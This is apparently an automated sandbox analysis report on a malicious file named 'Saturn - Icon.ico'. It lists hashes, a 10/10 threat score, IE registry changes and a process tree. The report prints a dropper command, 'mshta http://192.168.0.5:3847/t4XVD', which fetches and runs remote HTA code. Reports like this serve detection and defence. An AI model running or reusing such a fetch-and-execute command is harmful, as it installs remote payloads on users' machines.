Analysis
max time kernel: 96s
max time network: 84s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 03/04/2023, 21:30
Static task
static1
Behavioral task
behavioral1
Sample
Saturn - Icon.ico
Resource
win7-20230220-en
2 signatures
150 seconds
General
Target: Saturn - Icon.ico
Size: 4KB
MD5: aea4e29119b6b140a2ba9d99c0c78316
SHA1: 348486ce37c69c5204af0362e19dfd5691b5a817
SHA256: 2051fdcc57536ef32572aaacf924fec46ebe8d43a09199e4e8230f489a959e0b
SHA512: d73eb2ea0c6eaacb1b909ef8b208641ef407a1326dbeeb1ffac4ffd2249c5cb1cc3de392cbc13989303938c7aa027649988d649a2b493a5cc7a47b1fe546f359
SSDEEP: 24:subEH6uR+5CnVbsFCc/4a7ESvXbXmHQ90wP3smyUmzgioeTMhatD6q+xiz:dEDRGCVbsFC5a7EM6wrP8NUMRTNz
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
http://192.168.0.5:3847/t4XVD
Signatures
Modifies Internet Explorer settings 1 IoCs
    description: Key created
    ioc: \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Main
    Process: mshta.exe
Suspicious use of WriteProcessMemory 3 IoCs
    description                          pid   Process   procid_target
    PID 1840 wrote to memory of 1520     1840  cmd.exe   30
    PID 1840 wrote to memory of 1520     1840  cmd.exe   30
    PID 1840 wrote to memory of 1520     1840  cmd.exe   30
Processes
C:\Windows\System32\rundll32.exe
    command line: C:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen "C:\Users\Admin\AppData\Local\Temp\Saturn - Icon.ico"
    PID: 1540
C:\Windows\System32\cmd.exe
    command line: "C:\Windows\System32\cmd.exe"
    Suspicious use of WriteProcessMemory
    PID: 1840
    C:\Windows\system32\mshta.exe (child of cmd.exe, PID 1840)
        command line: mshta http://192.168.0.5:3847/t4XVD
        Modifies Internet Explorer settings
        PID: 1520